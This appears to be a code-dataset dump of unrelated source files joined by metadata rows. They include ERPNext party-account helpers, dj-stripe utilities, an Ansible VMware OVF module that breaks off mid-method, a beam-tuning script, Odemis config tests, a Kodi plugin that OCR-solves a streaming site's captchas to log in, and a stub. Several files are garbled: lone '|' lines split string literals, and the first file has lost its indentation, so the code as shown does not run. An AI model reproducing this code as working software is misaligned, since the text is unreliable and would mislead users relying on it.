out["taxes_and_charges"] = set_taxes(party.name, party_type, posting_date, company, out.customer_group, out.supplier_type)
if not out.get("currency"):
out["currency"] = currency
# sales team
if party_type=="Customer":
out["sales_team"] = [{
"sales_person": d.sales_person,
"allocated_percentage": d.allocated_percentage or None
} for d in party.get("sales_team")]
return out
def set_address_details(out, party, party_type, doctype=None, company=None):
billing_address_field = "customer_address" if party_type == "Lead" \
else party_type.lower() + "_address"
out[billing_address_field] = get_default_address(party_type, party.name)
if doctype:
out.update(get_fetch_values(doctype, billing_address_field, out[billing_address_field]))
# address display
out.address_display = get_address_display(out[billing_address_field])
# shipping address
if party_type in ["Customer", "Lead"]:
out.shipping_address_name = get_default_address(party_type, party.name, 'is_shipping_address')
out.shipping_address = get_address_display(out["shipping_address_name"])
if doctype:
out.update(get_fetch_values(doctype, 'shipping_address_name', out.shipping_address_name))
if doctype and doctype in ['Delivery Note', 'Sales Invoice']:
out.update(get_company_address(company))
if out.company_address:
out.update(get_fetch_values(doctype, 'company_address', out.company_address))
def set_contact_details(out, party, party_type):
out.contact_person = get_default_contact(party_type, party.name)
if not out.contact_person:
out.update({
"contact_person": None,
"contact_display": None,
"contact_email": None,
"contact_mobile": None,
"contact_phone": None,
"contact_designation": None,
"contact_department": None
})
else:
out.update(get_contact_details(out.contact_person))
def set_other_values(out, party, party_type):
# copy
if party_type=="Customer":
to_copy = ["customer_name", "customer_group", "territory", "language"]
else:
to_copy = ["supplier_name", "supplier_type", "language"]
for f in to_copy:
out[f] = party.get(f)
# fields prepended with default in Customer doctype
for f in ['currency'] \
+ (['sales_partner', 'commission_rate'] if party_type=="Customer" else []):
if party.get("default_" + f):
out[f] = party.get("default_" + f)
def get_default_price_list(party):
"""Return default price list for party (Document object)"""
if party.default_price_list:
return party.default_price_list
if party.doctype == "Customer":
price_list = frappe.db.get_value("Customer Group",
party.customer_group, "default_price_list")
if price_list:
return price_list
return None
def set_price_list(out, party, party_type, given_price_list):
# price list
price_list = filter(None, get_user_permissions().get("Price List", []))
if isinstance(price_list, list):
price_list = price_list[0] if len(price_list)==1 else None
if not price_list:
price_list = get_default_price_list(party)
if not price_list:
price_list = given_price_list
if price_list:
out.price_list_currency = frappe.db.get_value("Price List", price_list, "currency")
out["selling_price_list" if party.doctype=="Customer" else "buying_price_list"] = price_list
def set_account_and_due_date(party, account, party_type, company, posting_date, doctype):
if doctype not in ["Sales Invoice", "Purchase Invoice"]:
# not an invoice
return {
party_type.lower(): party
}
if party:
account = get_party_account(party_type, party, company)
account_fieldname = "debit_to" if party_type=="Customer" else "credit_to"
out = {
party_type.lower(): party,
account_fieldname : account,
"due_date": get_due_date(posting_date, party_type, party, company)
}
return out
@frappe.whitelist()
def get_party_account(party_type, party, company):
"""Returns the account for the given `party`.
Will first search in party (Customer / Supplier) record, if not found,
will search in group (Customer Group / Supplier Type),
finally will return default."""
if not company:
frappe.throw(_("Please select a
|
Company"))
if party:
account = frappe.db.get_value("Party Account",
{"parenttype": party_type, "parent": party, "company": company}, "account")
        if not account and party_type in ['Customer', 'Supplier']:
party_group_doctype = "Customer Group" if party_type=="Customer" else "Supplier Type"
group = frappe.db.get_value(party_type, party, scrub(party_group_doctype))
account = frappe.db.get_value("Party Account",
{"parenttype": party_group_doctype, "parent": group, "company": company}, "account")
if not account and party_type in ['Customer', 'Supplier']:
default_account_name = "default_receivable_account" \
if party_type=="Customer" else "default_payable_account"
account = frappe.db.get_value("Company", company, default_account_name)
existing_gle_currency = get_party_gle_currency(party_type, party, company)
if existing_gle_currency:
if account:
account_currency = frappe.db.get_value("Account", account, "account_currency")
if (account and account_currency != existing_gle_currency) or not account:
account = get_party_gle_account(party_type, party, company)
return account
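# Hedged usage sketch (not part of ERPNext): the party and company names below are
# hypothetical, and a real call needs a Frappe site context where those records exist.
def _example_receivable_account():
    # Resolution order per the docstring above: Party Account on the Customer ->
    # Party Account on its Customer Group -> the Company's default_receivable_account,
    # reconciled against the currency of any existing GL Entries.
    return get_party_account("Customer", "Acme Corp", "Acme Holdings")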
def get_party_account_currency(party_type, party, company):
def generator():
party_account = get_party_account(party_type, party, company)
return frappe.db.get_value("Account", party_account, "account_currency")
return frappe.local_cache("party_account_currency", (party_type, party, company), generator)
def get_party_gle_currency(party_type, party, company):
def generator():
existing_gle_currency = frappe.db.sql("""select account_currency from `tabGL Entry`
where docstatus=1 and company=%(company)s and party_type=%(party_type)s and party=%(party)s
limit 1""", { "company": company, "party_type": party_type, "party": party })
return existing_gle_currency[0][0] if existing_gle_currency else None
    return frappe.local_cache("party_gle_currency", (party_type, party, company), generator)
|
jameshiew/dj-stripe
|
djstripe/utils.py
|
Python
|
mit
| 4,844
| 0.002685
|
# -*- coding: utf-8 -*-
"""
.. module:: djstripe.utils.
:synopsis: dj-stripe - Utility functions related to the djstripe app.
.. moduleauthor:: @kavdev, @pydanny, @wahuneke
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import datetime
from django.conf import settings
from django.contrib.auth import get_user_model
from django.contrib.auth.models import AnonymousUser
from django.core.exceptions import ImproperlyConfigured
from django.db.models.query import QuerySet
from django.utils import timezone
ANONYMOUS_USER_ERROR_MSG = (
"dj-stripe's payment checking mechanisms require the user "
"be authenticated before use. Please use djan
|
go.contrib.auth's "
"login_required decorator or a LoginRequiredMixin. "
"Please read the warning at "
"http://dj-stripe.readthedocs.org/en/latest/usage.html#ongoing-subscriptions."
)
def subscriber_has_active_subscription(subscriber, plan=None):
"""
Helper function to check if a subscriber has an active subscription.
    Throws ImproperlyConfigured if the subscriber is an instance of AUTH_USER_MODEL
    and get_user_model().is_anonymous == True.
    Active subscription rules (or):
* customer has active subscription
If the subscriber is an instance of AUTH_USER_MODEL, active subscription rules (or):
* customer has active subscription
* user.is_superuser
* user.is_staff
:param subscriber: The subscriber for which to check for an active subscription.
:type subscriber: dj-stripe subscriber
:param plan: The plan for which to check for an active subscription. If plan is None and
there exists only one subscription, this method will check if that subscription
is active. Calling this method with no plan and multiple subscriptions will throw
an exception.
:type plan: Plan or string (plan ID)
"""
if isinstance(subscriber, AnonymousUser):
raise ImproperlyConfigured(ANONYMOUS_USER_ERROR_MSG)
if isinstance(subscriber, get_user_model()):
if subscriber.is_superuser or subscriber.is_staff:
return True
from .models import Customer
customer, created = Customer.get_or_create(subscriber)
if created or not customer.has_active_subscription(plan):
return False
return True
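# Hedged usage sketch (not part of dj-stripe): a hypothetical view-level guard that
# only illustrates the intended call pattern for the helper above.
def _subscriber_gate_example(request):
    """Return True when the requesting user should see subscriber-only content."""
    return subscriber_has_active_subscription(request.user)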
def get_supported_currency_choices(api_key):
"""
    Pull a stripe account's supported currencies and return a choices tuple of those currencies.
:param api_key: The api key associated with the account from which to pull data.
:type api_key: str
"""
import stripe
stripe.api_key = api_key
account = stripe.Account.retrieve()
supported_payment_currencies = stripe.CountrySpec.retrieve(account["country"])["supported_payment_currencies"]
return [(currency, currency.upper()) for currency in supported_payment_currencies]
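# Hedged usage sketch: STRIPE_TEST_SECRET_KEY is a hypothetical settings name, and the
# resulting choices depend entirely on the Stripe account's country, e.g.:
#   CURRENCY_CHOICES = get_supported_currency_choices(settings.STRIPE_TEST_SECRET_KEY)
#   # -> [("usd", "USD"), ("eur", "EUR"), ...]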
def dict_nested_accessor(d, name):
"""
Access a dictionary value, possibly in a nested dictionary.
>>> dict_nested_accessor({'id': 'joe'}, 'id')
"joe"
>>> dict_nested_accessor({'inner': {'id': 'joe'}}, 'inner.id')
"joe"
:type d: dict
"""
names = name.split(".", 1)
if len(names) > 1:
return dict_nested_accessor(d[names[0]], names[1])
else:
return d[name]
def clear_expired_idempotency_keys():
from .models import IdempotencyKey
threshold = timezone.now() - datetime.timedelta(hours=24)
IdempotencyKey.objects.filter(created__lt=threshold).delete()
def convert_tstamp(response):
"""
Convert a Stripe API timestamp response (unix epoch) to a native datetime.
:rtype: datetime
"""
if response is None:
# Allow passing None to convert_tstamp()
return response
# Overrides the set timezone to UTC - I think...
tz = timezone.utc if settings.USE_TZ else None
return datetime.datetime.fromtimestamp(response, tz)
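# Worked example (hedged): 1609459200 is 2021-01-01T00:00:00Z, so with settings.USE_TZ
# enabled this returns an aware UTC datetime for that instant; with USE_TZ disabled it
# returns a naive datetime in the server's local time.
#   convert_tstamp(1609459200)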
# TODO: Finish this.
CURRENCY_SIGILS = {
"CAD": "$",
"EUR": "€",
"GBP": "£",
"USD": "$",
}
def get_friendly_currency_amount(amount, currency):
currency = currency.upper()
sigil = CURRENCY_SIGILS.get(currency, "")
return "{sigil}{amount} {currency}".format(sigil=sigil, amount=amount, currency=currency)
class QuerySetMock(QuerySet):
"""
A mocked QuerySet class that does not handle updates.
Used by UpcomingInvoice.invoiceitems.
"""
@classmethod
def from_iterable(cls, model, iterable):
instance = cls(model)
instance._result_cache = list(iterable)
instance._prefetch_done = True
return instance
def _clone(self):
return self.__class__.from_iterable(self.model, self._result_cache)
def update(self):
return 0
def delete(self):
return 0
|
roadmapper/ansible
|
lib/ansible/modules/cloud/vmware/vmware_deploy_ovf.py
|
Python
|
gpl-3.0
| 22,956
| 0.002701
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2017, Matt Martz <[email protected]>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
author: 'Matt Martz (@sivel)'
short_description: 'Deploys a VMware virtual machine from an OVF or OVA file'
description:
- 'This module can be used to deploy a VMware VM from an OVF or OVA file'
module: vmware_deploy_ovf
notes: []
options:
allow_duplicates:
default: "yes"
description:
- Whether or not to allow duplicate VM names. ESXi allows duplicates, vCenter may not.
type: bool
datacenter:
default: ha-datacenter
description:
- Datacenter to deploy to.
type: str
cluster:
description:
- Cluster to deploy to.
type: str
datastore:
default: datastore1
description:
- Datastore to deploy to.
- "You can also specify datastore storage cluster. version_added: 2.9"
type: str
deployment_option:
description:
- The key of the chosen deployment option.
type: str
disk_provisioning:
choices:
- flat
- eagerZeroedThick
- monolithicSparse
- twoGbMaxExtentSparse
- twoGbMaxExtentFlat
- thin
- sparse
- thick
- seSparse
- monolithicFlat
default: thin
description:
- Disk provisioning type.
type: str
fail_on_spec_warnings:
description:
- Cause the module to treat OVF Import Spec warnings as errors.
default: "no"
type: bool
folder:
description:
- Absolute path of folder to place the virtual machine.
- If not specified, defaults to the value of C(datacenter.vmFolder).
- 'Examples:'
- ' folder: /ha-datacenter/vm'
- ' folder: ha-datacenter/vm'
- ' folder: /datacenter1/vm'
- ' folder: datacenter1/vm'
- ' folder: /datacenter1/vm/folder1'
- ' folder: datacenter1/vm/folder1'
- ' folder: /folder1/datacenter1/vm'
- ' folder: folder1/datacenter1/vm'
- ' folder: /folder1/datacenter1/vm/folder2'
type: str
inject_ovf_env:
description:
- Force the given properties to be inserted into an OVF Environment and injected through VMware Tools.
version_added: "2.8"
type: bool
name:
description:
- Name of the VM to work with.
- Virtual machine names in vCenter are not necessarily unique, which may be problematic.
type: str
networks:
default:
VM Network: VM Network
description:
- 'C(key: value) mapping of OVF network name, to the vCenter network name.'
type: dict
ovf:
description:
- 'Path to OVF or OVA file to deploy.'
aliases:
- ova
power_on:
default: true
description:
- 'Whether or not to power on the virtual machine after creation.'
type: bool
properties:
description:
- The assignment of values to the properties found in the OVF as key value pairs.
type: dict
resource_pool:
default: Resources
description:
- Resource Pool to deploy to.
type: str
wait:
default: true
description:
- 'Wait for the host to power on.'
type: bool
wait_for_ip_address:
default: false
description:
- Wait until vCenter detects an IP address for the VM.
- This requires vmware-tools (vmtoolsd) to properly work after creation.
type: bool
requirements:
- pyvmomi
version_added: "2.7"
extends_documentation_fragment: vmware.documentation
'''
EXAMPLES = r'''
- vmware_deploy_ovf:
hostname: '{{ vcenter_hostname }}'
username: '{{ vcenter_username }}'
password: '{{ vcenter_password }}'
ovf: /path/to/ubuntu-16.04-amd64.ovf
wait_for_ip_address: true
delegate_to: localhost
# Deploys a new VM named 'NewVM' in specific datacenter/cluster, with network mapping taken from variable and using ova template from an absolute path
- vmware_deploy_ovf:
hostname: '{{ vcenter_hostname }}'
username: '{{ vcenter_username }}'
password: '{{ vcenter_password }}'
datacenter: Datacenter1
cluster: Cluster1
datastore: vsandatastore
name: NewVM
networks: "{u'VM Network':u'{{ ProvisioningNetworkLabel }}'}"
validate_certs: no
power_on: no
ovf: /absolute/path/to/template/mytemplate.ova
delegate_to: localhost
'''
RETURN = r'''
instance:
description: metadata about the new virtual machine
returned: always
type: dict
sample: None
'''
import io
import os
import sys
import tarfile
import time
import traceback
import xml.etree.ElementTree as ET
from threading import Thread
from ansible.module_utils._text import to_native
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six import string_types
from ansible.module_utils.urls import generic_urlparse, open_url, urlparse, urlunparse
from ansible.module_utils.vmware import (find_network_by_name, find_vm_by_name, PyVmomi,
gather_vm_facts, vmware_argument_spec, wait_for_task, wait_for_vm_ip)
try:
from ansible.module_utils.vmware import vim
from pyVmomi import vmodl
except ImportError:
pass
def path_exists(value):
if not isinstance(value, string_types):
value = str(value)
value = os.path.expanduser(os.path.expandvars(value))
if not os.path.exists(value):
raise ValueError('%s is not a valid path' % value)
return value
class ProgressReader(io.FileIO):
def __init__(self, name, mode='r', closefd=True):
self.bytes_read = 0
io.FileIO.__init__(self, name, mode=mode, closefd=closefd)
def read(self, size=10240):
chunk = io.FileIO.read(self, size)
self.bytes_read += len(chunk)
return chunk
class TarFileProgressReader(tarfile.ExFileObject):
def __init__(self, *args):
self.bytes_read = 0
tarfile.ExFileObject.__init__(self, *args)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
try:
self.close()
except Exception:
pass
def read(self, size=10240):
chunk = tarfile.ExFileObject.read(self, size)
self.bytes_read += len(chunk)
return chunk
class VMDKUploader(Thread):
def __init__(self, vmdk, url, validate_certs=True, tarinfo=None, create=False):
Thread.__init__(self)
self.vmdk = vmdk
if tarinfo:
self.size = tarinfo.size
else:
self.size = os.stat(vmdk).st_size
self.url = url
self.validate_certs = validate_certs
self.tarinfo = tarinfo
self.f = None
self.e = None
self._create = create
@property
def bytes_read(self):
try:
return self.f.bytes_read
except AttributeError:
return 0
def _request_opts(self):
'''
Requests for vmdk files differ from other file types. Build the request options here to handle that
'''
headers = {
            'Content-Length': self.size,
'Content-Type': 'application/octet-stream',
}
if self._create:
# Non-VMDK
method = 'PUT'
headers['Overwrite'] = 't'
else:
# VMDK
method = 'POST'
headers['Content-Type'] = 'application/x-vnd.vmware-streamVmdk'
return {
'method': method,
'headers': headers,
}
def _open_url(self):
open_url(self.url, data=self.f, validate_certs=self.validate_certs, **self._request_opts())
def run(self):
if self.tarinfo:
|
sserkez/ocelot
|
mint/flash_tune.py
|
Python
|
gpl-3.0
| 2,806
| 0.024947
|
'''
main tuning script, LCLS
'''
import numpy as np
from ocelot.mint.mint import Optimizer, Action
from ocelot.mint.flash1_interface import FLASH1MachineInterface, FLASH1DeviceProperties, TestInterface
mi = FLASH1MachineInterface()
dp = FLASH1DeviceProperties()
#opt = Optimizer(mi, dp)
opt = Optimizer(TestInterface(), dp)
opt.debug = True
opt.logging = True
opt.log_file = 'test.log'
opt.timeout = 1.2
seq1 = [Action(func=opt.max_sase, args=[ ['H10SMATCH','H12SMATCH'], 'simplex'] ) ]
seq2 = [Action(func=opt.max_sase, args=[ ['V14SMATCH','V7SMATCH'], 'simplex' ] )]
seq3 = [Action(func=opt.max_sase, args=[ ['V14SMATCH','V7SMATCH','H10SMATCH','H12SMATCH'], 'simplex' ] )]
seq4 = [Action(func=opt.max_sase, args=[ ['Q13SMATCH','Q15SMATCH'], 'simplex' ] )]
seq5 = [Action(func=opt.max_sase, args=[ ['H3DBC3','V3DBC3'], 'simplex' ] )]
seq6 = [Action(func=opt.max_sase, args=[ ['H3DBC3','V3DBC3','H10ACC7','V10ACC7'], 'simplex' ] )]
seq7 = [Action(func=opt.max_sase, args=[ ['Q5UND1.3.5','Q5UND2.4'], 'simplex' ] )]
seq8 = [Action(func=opt.max_sase, args=[ ['H3UND1','H3UND3','H3UND4','H3UND5'], 'simplex' ] )]
seq9 = [Action(func=opt.max_sase, args=[ ['H8TCOL','V8TCOL'], 'simplex' ] )]
seq10 = [Action(func=opt.max_sase, args=[ ['H3DBC3'], 'simplex' ] )]
seq0 = [Action(func=opt.max_sase, args=[ ['H10SMATCH','H12SMATCH'], 'cg', {'maxiter':15}] ),
Action(func=opt.max_sase, args=[ ['H10SMATCH','H12SMATCH'], 'simplex', {'maxiter':25}] )]
opt.eval(seq1)
"""
#import json
def get_dict(lat, bpms):
dict_bpms = {}
for elem in lat.sequence:
if elem.type == "monitor" and elem.mi_id in bpms:
dict_bpms[elem.mi_id] = {}
dict_bpms[elem.mi_id]["x"] = elem.x
dict_bpms[elem.mi_id]["y"] = elem.y
return dict_bpms
#dp = FLASH1DeviceProperties()
def apply_bump(names, currents, dIs, alpha):
mi.set_value(names, currents+dIs*alpha)
cors = ['H3DBC3', 'H10ACC4','H9ACC5', 'H10ACC5', 'H9ACC6', 'H10ACC6', 'H10ACC7']
dI = np.array([-0.0114768844711, -0.183727960466, 0.325959042831, 0.318743893708, 0.15280311903, 0.130996600233, -0.831909116508])
currents = np.array([ -0.0229914523661, 0.0250000003725, 0.985000014305, 0.0, -1.17299997807, 0.0, 0.148000001907])
bump = {"correctors":cors, "dI": dI, "currents":currents}
alpha = 0.1
seq_bump = [Action(func=opt.max_sase_bump, args=[ bump, alpha, 'simplex' ] )]
orbit = {}
orbit["correctors"] =
|
['H3SFELC', 'H4SFELC', 'H10SMATCH', 'D11SMATCH', 'H12SMATCH']
setup = log.MachineSetup()
#setup.save_lattice(lat, "init.txt")
lat_all = MagneticLattice(lattice)
setup.load_lattice("init.txt", lat_all)
orbit["bpms"] = get_dict(lat, bpms)
seq_min_orb = [Action(func=opt.min_orbit, args=[orbit, 'simplex' ] )]
opt.eval(seq_bump)
apply_bump(cors, currents, dI, alpha=0.1)
"""
|
delmic/odemis
|
src/odemis/gui/conf/test/conf_test.py
|
Python
|
gpl-2.0
| 6,386
| 0.001097
|
# -*- coding: utf-8 -*-
"""
:created: 27 Aug 2014
:author: Éric Piel
:copyright: © 2014 Éric Piel, Delmic
This file is part of Odemis.
.. license::
Odemis is free software: you can redistribute it and/or modify it under the terms of the GNU
General Public License version 2 as published by the Free Software Foundation.
Odemis is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License along with Odemis. If not,
see http://www.gnu.org/licenses/.
"""
from __future__ import division
from past.builtins import basestring
import logging
import odemis.gui.conf.file as conffile
import odemis.gui as gui
from odemis.util import test
import os
import shutil
import unittest
from unittest.case import skip
logging.getLogger().setLevel(logging.DEBUG)
class ConfigTest(object):
""" Generic test setup/teardown methods for testing one configuration """
# .conf_class must be defined
def setUp(self):
# save the real user file to be able to do whatever we like
filename = os.path.join(conffile.CONF_PATH, self.conf_class.file_name)
backname = filename + u".testbak"
if os.path.exists(filename):
logging.info("Saving file %s", filename)
shutil.copy2(filename, backname)
self.backname = backname
else:
self.backname = None
self.filename = filename
def tearDown(self):
if self.backname:
logging.info("Restoring file %s", self.filename)
shutil.copy2(self.backname, self.filename)
else:
try:
os.remove(self.filename)
except OSError:
pass
else:
logging.info("Deleting test file %s", self.filename)
# Reset the module globals
gui.conf.CONF_GENERAL = None
gui.conf.CONF_ACQUI = None
gui.conf.CONF_CALIB = None
class GeneralConfigTest(ConfigTest, unittest.TestCase):
conf_class = gui.conf.file.GeneralConfig
def test_simple(self):
conf = gui.conf.get_general_conf()
path = conf.get_manual()
if path is not None:
self.assertTrue(os.path.exists(path))
path = conf.get_manual("secom")
if path is not None:
self.assertTrue(os.path.exists(path))
path = conf.get_dev_manual()
if path is not None:
self.assertTrue(os.path.exists(path))
def test_save(self):
conf = gui.conf.get_general_conf()
conf.set("calibration", "ar_file", u"booo")
# reset
del conf
gui.conf.CONF_GENERAL = None
conf = gui.conf.get_general_conf()
path = conf.get("calibration", "ar_file")
self.assertEqual(path, u"booo")
def test_save_unicode(self):
conf = gui.conf.get_general_conf()
conf.set("calibration", "ar_file", u"booµ")
# reset
del conf
gui.conf.CONF_GENERAL = None
conf = gui.conf.get_general_conf()
path = conf.get("calibration", "ar_file")
self.assertEqual(path, u"booµ")
def test_default(self):
try:
os.remove(self.filename)
except OSError:
pass
conf = gui.conf.get_general_conf()
path = conf.get("calibration", "ar_file")
self.assertEqual(path, u"")
path = conf.get("calibration", "spec_file")
self.assertEqual(path, u"")
path = conf.get_manual()
self.assertTrue(path.endswith(u".pdf"))
class AcquisitionConfigTest(ConfigTest, unittest.TestCase):
conf_class = gui.conf.file.AcquisitionConfig
def test_simple(self):
conf = gui.conf.get_acqui_conf()
self.assertIsInstance(conf.last_path, basestring)
self.assertIsInstance(conf.last_format, basestring)
        self.assertLess(len(conf.last_extension), 12)
def test_save(self):
# Will fail if setting the properties goes wrong
conf = gui.conf.get_acqui_conf()
conf.last_path = u"/home/booo/"
conf.last_format = "HDF5"
conf.last_extension = ".h5"
        conf.fn_ptn = u"{timelng}-test {cnt}"
def test_save_unicode(self):
conf = gui.conf.get_acqui_conf()
conf.last_path = u"/home/boooµ/"
conf.last_format = "HDF5"
conf.last_extension = ".h5"
conf.fn_ptn = u"{timelng}-test {cnt} µm value"
class CalibrationConfigTest(ConfigTest, unittest.TestCase):
conf_class = gui.conf.file.CalibrationConfig
def test_simple(self):
conf = gui.conf.get_calib_conf()
# non existing id should return None
calib = conf.get_sh_calib(0)
self.assertIs(calib, None)
def test_save(self):
conf = gui.conf.get_calib_conf()
shid = 125166841353
# try with a bit annoying numbers
htop = (-0.5, 1e-6)
hbot = (5e9, -1.55158e-6)
hfoc = 0.006
ofoc = -0.001e-6
strans = (5.468e-3, -365e-6)
sscale = (1.1, 0.9)
srot = 0.1
iscale = (13.1, 13.1)
irot = 5.9606
iscale_xy = (1.01, 0.9)
ishear = 1.1
resa = (8.09, 2.16)
resb = (-157.5, -202.9)
hfwa = (-0.953, -0.009)
scaleshift = (0.029, -2.90e-05)
orig_calib = (htop, hbot, hfoc, ofoc, strans, sscale, srot, iscale, irot,
iscale_xy, ishear, resa, resb, hfwa, scaleshift)
conf.set_sh_calib(shid, *orig_calib)
# read back from memory
back_calib = conf.get_sh_calib(shid)
for o, b in zip(orig_calib, back_calib):
if isinstance(o, tuple):
test.assert_tuple_almost_equal(o, b)
else:
self.assertAlmostEqual(o, b)
# read back from file
del conf
gui.conf.CONF_CALIB = None
conf = gui.conf.get_calib_conf()
back_calib = conf.get_sh_calib(shid)
for o, b in zip(orig_calib, back_calib):
if isinstance(o, tuple):
test.assert_tuple_almost_equal(o, b)
else:
self.assertAlmostEqual(o, b)
if __name__ == "__main__":
unittest.main()
|
marcuschia/ShaniXBMCWork
|
other/livetvPlayer.py
|
Python
|
gpl-2.0
| 7,065
| 0.045294
|
# -*- coding: utf-8 -*-
import xbmc, xbmcgui, xbmcplugin
import urllib2,urllib,cgi, re
import HTMLParser
import xbmcaddon
import json
import traceback
import os
import cookielib
from BeautifulSoup import BeautifulStoneSoup, BeautifulSoup, BeautifulSOAP
import datetime
import sys
import time
import CustomPlayer
import captcha
__addon__ = xbmcaddon.Addon()
__addonname__ = __addon__.getAddonInfo('name')
__icon__ = __addon__.getAddonInfo('icon')
addon_id = 'plugin.video.shahidmbcnet'
selfAddon = xbmcaddon.Addon(id=addon_id)
addonPath = xbmcaddon.Addon().getAddonInfo("path")
addonArt = os.path.join(addonPath,'resources/images')
communityStreamPath = os.path.join(addonPath,'resources/community')
COOKIEFILE = communityStreamPath+'/livePlayerLoginCookie.lwp'
profile_path = xbmc.translatePath(selfAddon.getAddonInfo('profile'))
def PlayStream(sourceEtree, urlSoup, name, url):
try:
playpath=urlSoup.chnumber.text
pDialog = xbmcgui.DialogProgress()
pDialog.create('XBMC', 'Communicating with Livetv')
pDialog.update(40, 'Attempting to Login')
if shouldforceLogin():
if performLogin():
print 'done login'
print 'ooops'
code=getcode();
print 'firstCode',code
if 1==2 and not code or code[0:1]=="w":
pDialog.update(40, 'Refreshing Login')
code=getcode(True);
print 'secondCode',code
liveLink= sourceEtree.findtext('rtmpstring')
pDialog.update(80, 'Login Completed, now playing')
print 'rtmpstring',liveLink
#liveLink=liveLink%(playpath,match)
liveLink=liveLink%(playpath,code)
name+='-LiveTV'
print 'liveLink',liveLink
listitem = xbmcgui.ListItem( label = str(name), iconImage = "DefaultVideo.png", thumbnailImage = xbmc.getInfoImage( "ListItem.Thumb" ), path=liveLink )
        pDialog.close()
player = CustomPlayer.MyXBMCPlayer()
start = time.time()
#xbmc.Player().play( liveLink,listitem)
player.play( liveLink,listitem)
while player.is_active:
xbmc.sleep(200)
#return player.urlplayed
#done = time.time()
done = time.time()
elapsed = done - start
if player.urlplayed and elapsed>=3:
return True
else:
return False
except:
traceback.print_exc(file=sys.stdout)
return False
def getcode():
#url = urlSoup.url.text
cookieJar=getCookieJar()
link=getUrl('http://www.livetv.tn/index.php',cookieJar)
captcha=None
match =re.findall('<img src=\"(.*?)\" alt=\"CAPT', link)
if len(match)>0:
captcha="http://www.livetv.tn"+match[0]
else:
captcha=None
solution=None
if captcha:
local_captcha = os.path.join(profile_path, "captchaC.img" )
localFile = open(local_captcha, "wb")
localFile.write(getUrl(captcha,cookieJar))
localFile.close()
cap=parseCaptcha(local_captcha)
print 'parsed cap',cap
if cap=="" or not len(cap)==3:
solver = InputWindow(captcha=local_captcha)
solution = solver.get()
else:
solution=cap
if solution:
#do captcha post
post={'capcode':solution}
post = urllib.urlencode(post)
link=getUrl("http://www.livetv.tn/",cookieJar,post)
code =re.findall('code=(.*?)[\'\"]', link)[0]
return code
def parseCaptcha(filePath):
retVal=""
try:
print 'the val is'
retVal=captcha.getString(filePath)
print 'the val is',retVal
except: traceback.print_exc(file=sys.stdout)
return retVal
def getUrl(url, cookieJar=None,post=None):
cookie_handler = urllib2.HTTPCookieProcessor(cookieJar)
opener = urllib2.build_opener(cookie_handler, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler())
#opener = urllib2.install_opener(opener)
req = urllib2.Request(url)
req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36')
response = opener.open(req,post)
link=response.read()
response.close()
return link;
def getCookieJar():
cookieJar=None
try:
cookieJar = cookielib.LWPCookieJar()
cookieJar.load(COOKIEFILE,ignore_discard=True)
except:
cookieJar=None
if not cookieJar:
cookieJar = cookielib.LWPCookieJar()
return cookieJar
def performLogin():
cookieJar=cookielib.LWPCookieJar()
html_text=getUrl("http://www.livetv.tn/login.php",cookieJar)
cookieJar.save (COOKIEFILE,ignore_discard=True)
print 'cookie jar saved',cookieJar
match =re.findall('<img src=\"(.*?)\" alt=\"Cap', html_text)
if len(match)>0:
captcha="http://www.livetv.tn/"+match[0]
else:
captcha=None
if captcha:
local_captcha = os.path.join(profile_path, "captcha.img" )
localFile = open(local_captcha, "wb")
localFile.write(getUrl(captcha,cookieJar))
localFile.close()
cap=parseCaptcha(local_captcha)
print 'login parsed cap',cap
if cap=="" or not len(cap)==4:
solver = InputWindow(captcha=local_captcha)
solution = solver.get()
else:
solution=cap
if solution or captcha==None:
print 'performing login'
userName=selfAddon.getSetting( "liveTvLogin" )
password=selfAddon.getSetting( "liveTvPassword")
if captcha:
post={'pseudo':userName,'epass':password,'capcode':solution}
else:
post={'pseudo':userName,'epass':password}
post = urllib.urlencode(post)
getUrl("http://www.livetv.tn/login.php",cookieJar,post)
return shouldforceLogin(cookieJar)==False
else:
return False
def shoudforceLogin2():
try:
# import dateime
lastUpdate=selfAddon.getSetting( "lastLivetvLogin" )
print 'lastUpdate',lastUpdate
do_login=False
now_datetime=datetime.datetime.now()
if lastUpdate==None or lastUpdate=="":
do_login=True
else:
print 'lastlogin',lastUpdate
try:
lastUpdate=datetime.datetime.strptime(lastUpdate,"%Y-%m-%d %H:%M:%S")
except TypeError:
lastUpdate = datetime.datetime.fromtimestamp(time.mktime(time.strptime(lastUpdate, "%Y-%m-%d %H:%M:%S")))
t=(now_datetime-lastUpdate).seconds/60
print 'lastUpdate',lastUpdate,now_datetime
print 't',t
if t>15:
do_login=True
print 'do_login',do_login
return do_login
except:
traceback.print_exc(file=sys.stdout)
return True
def shouldforceLogin(cookieJar=None):
try:
url="http://www.livetv.tn/index.php"
if not cookieJar:
cookieJar=getCookieJar()
html_txt=getUrl(url,cookieJar)
if '<a href="http://www.livetv.tn/login.php">' in html_txt:
return True
else:
return False
except:
traceback.print_exc(file=sys.stdout)
return True
class InputWindow(xbmcgui.WindowDialog):
def __init__(self, *args, **kwargs):
self.cptloc = kwargs.get('captcha')
self.img = xbmcgui.ControlImage(335,30,624,60,self.cptloc)
self.addControl(self.img)
self.kbd = xbmc.Keyboard()
def get(self):
self.show()
time.sleep(3)
self.kbd.doModal()
if (self.kbd.isConfirmed()):
text = self.kbd.getText()
self.close()
return text
self.close()
return False
|
Chasego/codirit
|
jiuzhang/Nine Chapters/3 Binary Tree & Divide Conquer/py/BalancedBinaryTree_rec.py
|
Python
|
mit
| 873
| 0.001145
|
"""
Definition of TreeNode:
class TreeNode:
def __init__(self, val):
self.val = val
self.left, self.right = None, None
"""
class Solution:
"""
@param root: The root of binary tree.
@return: True if this Binary tree is Balanced, or false.
"""
def isBalanced(self, root):
# write your code here
